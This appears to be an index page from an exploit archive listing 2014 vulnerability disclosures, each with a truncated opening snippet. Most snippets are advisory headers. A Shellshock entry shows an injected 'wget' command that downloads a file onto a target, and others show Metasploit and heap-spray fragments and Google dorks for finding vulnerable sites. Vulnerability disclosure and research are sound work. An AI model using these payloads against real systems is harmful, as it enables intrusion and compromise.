GS Foto Uebertraeger 3.0 iOS - Local File Inclusion

GS Foto Uebertraeger 3.0 iOS - Local File Inclusion Document Title: =============== GS Foto Uebertraeger v3.0 iOS - File Include Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1325 Release Date: ============= 2014-09-22 Vulnerability...

Microsoft Exchange - IIS HTTP Internal IP Address Disclosure (Metasploit)

Microsoft Exchange - IIS HTTP Internal IP Address Disclosure Metasploit Exploit Title: Microsoft Exchange IIS HTTP Internal IP Disclosure Vulnerability Google Dork: NA Date: 08/01/2014 Exploit Author: Nate Power Vendor Homepage: microsoft.com Software Link: NA Version: Exchange OWA 2003, Exchange...

Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.0 Bypass) (MS12-037)

Microsoft Internet Explorer 8 - Fixed Col Span ID Full ASLR + DEP + EMET 5.0 Bypass MS12-037 function strtointstr return str.charCodeAt10x10000 + str.charCodeAt0; var free = "EEEE"; while free.length 500 free += free; var string1 = "AAAA"; while string1.length 500 string1 += string1; var string2...

OpenFiler 2.99.1 - Cross-Site Request Forgery

OpenFiler 2.99.1 - Cross-Site Request Forgery DoS...

dbPowerAmp 2.010.0 - Local Buffer Overflow

dbPowerAmp 2.010.0 - Local Buffer Overflow dbPowerAmp Buffer Overflow Vendor: Illustrate Product: dbPowerAmp Version: = 2.0/10.0 Website: http://www.dbpoweramp.com BID: 11266 CVE: CVE-2004-1569 OSVDB: 10380 11126 11127 SECUNIA: 12684 PACKETSTORM: 34531 Description: Often called the Swiss Army kni...

Typo3 Extension JobControl 2.14.0 - Cross-Site Scripting SQL Injection

Typo3 Extension JobControl 2.14.0 - Cross-Site Scripting SQL Injection Mogwai Security Advisory MSA-2014-02 ---------------------------------------------------------------------- Title: JobControl dmmjobcontrol Multiple Vulnerabilities Product: dmmjobcontrol Typo3 Extension Affected versions:...

Nucom ADSL ADSLR5000UN - ISP Credentials Disclosure

Nucom ADSL ADSLR5000UN - ISP Credentials Disclosure !/usr/bin/perl Exploit Author: Sebastián Magof Hardware: Modem Nucom ADSL R5000UNv2 Software Version: R5TC008 Vulnerable file: guidewan.html location: http://gateway/telecomGUI/guidewan.html Bug: ISP usr+pwd disclosure Type: Local Date: 24/09/20...

Cart Engine 3.0 - Multiple Vulnerabilities

Cart Engine 3.0 - Multiple Vulnerabilities === Details === Quantum Leap Advisory: http://www.quantumleap.it/cart-engine-3-0-multiple-vulnerabilities-sql-injection-reflected-xss-open-redirect/ Affected Product: Cart Engine Version: 3.0 === Executive Summary === SQL Injection: Using a specially...

OSClass 3.4.1 - index.php Local File Inclusion

OSClass 3.4.1 - index.php Local File Inclusion Information ----------- Advisory by Netsparker. Name : LFI Vulnerability in OsClass Affected Software : OsClass Affected Versions: 3.4.1 and possibly below Vendor Homepage : http://osclass.org/ Vulnerability Type : Local File Inclusion Severity :...

WordPress Plugin Login Widget With ShortCode 3.1.1 - Multiple Vulnerabilities

WordPress Plugin Login Widget With ShortCode 3.1.1 - Multiple Vulnerabilities Details ================ Software: Login Widget With Shortcode Version: 3.1.1 Homepage: http://wordpress.org/plugins/login-sidebar-widget/ Advisory report:...

GNU Bash - Shellshock Environment Variable Command Injection

GNU Bash - Shellshock Environment Variable Command Injection Exploit Database Note: The following is an excerpt from: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ Like “real” programming languages, Bash has functions, though in a...

Bash - Shellshock Environment Variables Command Injection

Bash - Shellshock Environment Variables Command Injection /cgi-bin/ -c cmd Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit" Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271remotecodeexecutionthroughbash/ Test CGI Code : !/bin/bash...

WordPress Plugin All In One WP Security 3.8.2 - SQL Injection

WordPress Plugin All In One WP Security 3.8.2 - SQL Injection Advisory ID: HTB23231 Product: All In One WP Security WordPress plugin Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy Vulnerable Versions: 3.8.2 and probably prior Tested Version: 3.8.2 Advisory Publication: September 3, 2014 without...

GNU Bash - Environment Variable Command Injection (Metasploit)

GNU Bash - Environment Variable Command Injection Metasploit require 'msf/core' class Metasploit3 'bashedCgi', 'Description' = %q Quick & dirty module to send the BASH exploit payload CVE-2014-6271 to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. , 'Author...

ZYXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure

ZYXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure !/usr/bin/perl Exploit Author: Sebastián Magof Hardware: ZyXEL Prestig P-660HNU-T1 Vulnerable file: wzADSL.asp location: http://gateway/cgi-bin/wzADSL.asp Bug: ISP usr+pwd disclosure Type: Local Date: 22/09/2014 Vendor Homepage:...

Restaurant Script (PizzaInn Project) - Persistent Cross-Site Scripting

Restaurant Script PizzaInn Project - Persistent Cross-Site Scripting Title: Pizza Inn Registration Stored XSS Severity: High CVE-ID: CVE-2014-6619 Release Date: 20 September 2014 Author: Kenneth F. Belva Websites: http://silverbackventuresllc.com http://xssWarrior.com http://securitymaverick.com...

WS10 Data Server - SCADA Overflow (PoC)

WS10 Data Server - SCADA Overflow PoC Exploit Title: WS10 Data Server SCADA Exploit Overflow PoC Date: 09/23/2014 Author: Pedro Sánchez Version: 1.83 English Tested on: Windows 7 embedded. Notified the vendor, vendor never responded. In the new version this PoC stops working Vendor: Novus...

Glype 1.4.9 - Local Address Filter Bypass

Glype 1.4.9 - Local Address Filter Bypass ------------------------------------------------------------------------ Glype proxy local address filter bypass ------------------------------------------------------------------------ Securify, September 2014...

Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion

Glype 1.4.9 - Cookie Injection Directory Traversal Local File Inclusion ------------------------------------------------------------------------ Glype proxy cookie jar path traversal allows code execution ------------------------------------------------------------------------ Securify, September...

webEdition 6.3.8.0 (SVN-Revision: 6985) - Directory Traversal

webEdition 6.3.8.0 SVN-Revision: 6985 - Directory Traversal Advisory ID: HTB23227 Product: webEdition Vendor: webEdition e.V. Vulnerable Versions: 6.3.8.0 SVN-Revision: 6985 and probably prior Tested Version: 6.3.8.0 SVN-Revision: 6985 Advisory Publication: August 6, 2014 without technical detail...

Joomla! Component com_macgallery 1.5 - Arbitrary File Download

Joomla! Component commacgallery 1.5 - Arbitrary File Download Exploit Title : Joomla Mac Gallery = 1.5 Arbitrary File Download Exploit Author : Claudio Viviani Vendor Homepage : https://www.apptha.com Software Link : https://www.apptha.com/downloadable/download/sample/sampleid/18 Dork Google:...

Joomla! Component com_facegallery 1.0 - Multiple Vulnerabilities

Joomla! Component comfacegallery 1.0 - Multiple Vulnerabilities Exploit Title : Joomla Face Gallery 1.0 Multiple Vulnerabilities Exploit Author : Claudio Viviani Vendor Homepage : https://www.apptha.com Software Link : https://www.apptha.com/downloadable/download/sample/sampleid/150 Dork Google:...

Onlineon E-Ticaret - Database Disclosure

Onlineon E-Ticaret - Database Disclosure !/usr/bin/env python -- coding:cp1254 -- Title : Onlineon E-Ticaret Database Disclosure Exploit .py dork : inurl:"default.asp?git=sepet" Author : ZoRLu / [email protected] / [email protected] Home : http://milw00rm.com / its online Download :...

LittleSite 0.1 - index.php Local File Inclusion

LittleSite 0.1 - index.php Local File Inclusion source: https://www.securityfocus.com/bid/43495/info LittleSite is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive...

vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection

vBulletin 4.x Verify Email Before Registration Plugin - SQL Injection Title: vBulletin Verify Email Before Registration Plugin - SQL Injection Date: September 19 2014 Version: Any vBulletin 4.. version which has the plugin installed. Plugin: http://www.vbulletin.org/forum/showthread.php?t=294164...

MMonit 3.3.2 - Cross-Site Request Forgery

MMonit 3.3.2 - Cross-Site Request Forgery Vulnerability title: M/Monit CSRF Author: Dolev Farhi Contact: dolevf at openflare dot com @dolevff Application: M/Monit 3.2.2 Date: 13.9.2014 Relevant CVEs: N/A Vulnerable version: CSRF PoC for M/monit input type="hidden...

Livefyre LiveComments Plugin - Persistent Cross-Site Scripting

Livefyre LiveComments Plugin - Persistent Cross-Site Scripting Title : Stored XSS in Livefyre LiveComments Plugin CVE : 2014-6420 Vendor Homepage : http://livefyre.com Software Link : http://web.livefyre.com/streamhub/liveComments Version : v3.0 Author : Brij Kishore Mishra Date : 03-Sept-2014...

ClassApps SelectSurvey.net - Multiple SQL Injections

ClassApps SelectSurvey.net - Multiple SQL Injections Exploit Title: Multiple SQL Injection Vulnerabilities in SelectSurvey.net Google Dork: intitle:SelectSurvey Date: Sep 03 2014 Vendor Homepage: https://www.classapps.com/ Software Link: https://www.classapps.com/SelectSurveyNETOverview.asp...

Fast Image Resizer 098 - Local Crash (PoC)

Fast Image Resizer 098 - Local Crash PoC !/usr/bin/perl Title : Fast Image Resizer 098 Local Crash Poc Author: Niko Tested: Windows XP SP3 En Apps : http://adionsoft.net/fastimageresize/FastImageResizer098.exe EAX 00000000 ECX 010422F8 EDX 00000000 EBX 00000000 ESP 0012F658 EBP 00000000 ESI...

Seafile-server 3.1.5 - Remote Denial of Service

Seafile-server 3.1.5 - Remote Denial of Service Exploit Title: ccnet-server remote DoS assert seafile-server = 3.1.5 Date: Sep 4, 2014 Exploit Author: retset Vendor Homepage: seafile.com Software Link: https://bitbucket.org/haiwen/seafile/downloads/seafile-server3.1.4win32.tar.gz Version:...

WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload (Python)

WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload Python !/usr/bin/env python WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit WordPress Slideshow Gallery plugin version 1.4.6 suffers from a remote shell upload vulnerability CVE-2014-5460 Vulnerability discovered by: Jesus...

Laravel - Hash::make() Password Truncation Security

Laravel - Hash::make Password Truncation Security source: https://www.securityfocus.com/bid/69849/info Laravel is prone to a security weakness due to pseudo password hash collision. Attackers can exploit this issue to bypass intended security restrictions. This may aid in further attacks. // user...

USBWiFi Flash Drive 1.3 iOS - Code Execution

USBWiFi Flash Drive 1.3 iOS - Code Execution Document Title: =============== USB&WiFi Flash Drive 1.3 iOS - Code Execution Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1316 Release Date: ============= 2014-09-15 Vulnerability Laboratory ...

ZTE ZXDSL-931VII - Configuration Dump

ZTE ZXDSL-931VII - Configuration Dump Exploit Title: ZTE ZXDSL-931VII Unauthenticated Configuration Dump Google Dork: use your imagination Date: 09-12-2014 Exploit Author: L0ukanik0sGR Vendor Homepage: www.zte.com.cn Software Link:...

Briefcase 4.0 iOS - Code Execution File Inclusion

Briefcase 4.0 iOS - Code Execution File Inclusion Document Title: =============== Briefcase 4.0 iOS - Code Execution & File Include Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1319 Release Date: ============= 2014-09-11 Vulnerability...

ALCASAR 2.8.1 - Remote Code Execution

ALCASAR 2.8.1 - Remote Code Execution !/usr/bin/env python -- coding: utf-8 -- ALCASAR = 2.8.1 Remote Root Code Execution Vulnerability Author: eF Date : 2014-09-12 URL : http://www.alcasar.net/ This is not a responsible disclosure coz' I have no sense of ethics and I don't give a fck. db 88...

CacheGuard-OS 5.7.7 - Cross-Site Request Forgery

CacheGuard-OS 5.7.7 - Cross-Site Request Forgery I. VULNERABILITY ------------------------- CSRF vulnerabilities in CacheGuard-OS v5.7.7 II. BACKGROUND ------------------------- CacheGuard is an All-in-One Web Security Gateway providing firewall, web antivirus, caching, compression, URL filtering...

Aztech Routers - cgi-binAZ_Retrain.cgi Denial of Service

Aztech Routers - cgi-binAZRetrain.cgi Denial of Service / source: https://www.securityfocus.com/bid/69809/info Multiple Aztech routers are prone to a denial-of-service vulnerability. Attackers may exploit this issue to cause an affected device to crash, resulting in a denial-of-service condition...

Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)

Rejetto HTTP File Server HFS 2.3.x - Remote Command Execution 1 Exploit Title: HttpFileServer 2.3.x Remote Command Execution Google Dork: intext:"httpfileserver 2.3" Date: 11-09-2014 Remote: Yes Exploit Author: Daniele Linguaglossa Vendor Homepage: http://rejetto.com/ Software Link:...

Aztech Modem Routers - Session Hijacking

Aztech Modem Routers - Session Hijacking source: https://www.securityfocus.com/bid/69811/info Multiple Aztech Modem Routers are prone to a session-hijacking vulnerability. An attacker can exploit this issue to gain unauthorized access to the affected device. !/usr/bin/perl Title: Aztech Modem...

Aztech Modem Routers - Information Disclosure

Aztech Modem Routers - Information Disclosure / source: https://www.securityfocus.com/bid/69808/info Aztech Modem Routers are prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. / HOST=$1...

WordPress Plugin Wordfence Security - Multiple Vulnerabilities

WordPress Plugin Wordfence Security - Multiple Vulnerabilities source: https://www.securityfocus.com/bid/69815/info The Wordfence Security Plugin for WordPress is prone to following vulnerabilities: 1. Multiple HTML-Injection vulnerabilities 2. Multiple Security Bypass vulnerabilities Successful...

Comodo Internet Security - HIPSSandbox Escape

Comodo Internet Security - HIPSSandbox Escape Exploit: http://www.joxeankoret.com/download/comodosandboxescape/sandboxtest1.tar.gz Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34648.tar.gz sandboxtest1.tar.gz Video:...

Ammyy Admin 3.5 - Remote Code Execution (Metasploit)

Ammyy Admin 3.5 - Remote Code Execution Metasploit Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/34647.zip aa0day.zip The Revenge of the Scammers This exploit is an 0day in Ammyy Admin http://www.ammyy.com/en/ a remote desktop type software that is wel...

Joomla! Component com_formmaker 3.4 - SQL Injection

Joomla! Component comformmaker 3.4 - SQL Injection Exploit Title : Joomla Spider Form Maker = 3.4 SQL Injection Exploit Author : Claudio Viviani Vendor Homepage : http://web-dorado.com/ Software Link : http://web-dorado.com/products/joomla-form.html Dork Google: inurl:comformmaker Date : 2014-09-...

Food Order Portal - admin_user_delete.php Cross-Site Request Forgery

Food Order Portal - adminuserdelete.php Cross-Site Request Forgery source: https://www.securityfocus.com/bid/69787/info Food Order Portal is prone to a cross-site request-forgery vulnerability. An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the...

OroCRM - Persistent Cross-Site Scripting

OroCRM - Persistent Cross-Site Scripting Affected software: OroCRM is an easy-to-use, open source CRM with built in marketing automation tools for your commerce business. It's the CRM built for both sales and marketing! Discovered by: Provensec Website: http://www.provensec.com Author: Provensec...

ChatSecure IM 2.2.4 iOS - Persistent Cross-Site Scripting

ChatSecure IM 2.2.4 iOS - Persistent Cross-Site Scripting Document Title: =============== ChatSecure IM v2.2.4 iOS - Persistent Web Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1317 Release Date: ============= 2014-09-10 Vulnerability...

Photorange 1.0 iOS - Local File Inclusion

Photorange 1.0 iOS - Local File Inclusion Document Title: =============== Photorange v1.0 iOS - File Include Web Vulnerability References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1318 Release Date: ============= 2014-09-07 Vulnerability Laboratory ID VL-ID:...

Joomla! Component Spider Contacts 1.3.6 - contacts_id SQL Injection

Joomla! Component Spider Contacts 1.3.6 - contactsid SQL Injection !/usr/bin/env python Exploit Title : Joomla Spider Contacts = 1.3.6 SQL Injection Exploit Author : Claudio Viviani Vendor Homepage : http://web-dorado.com/ Software Link :...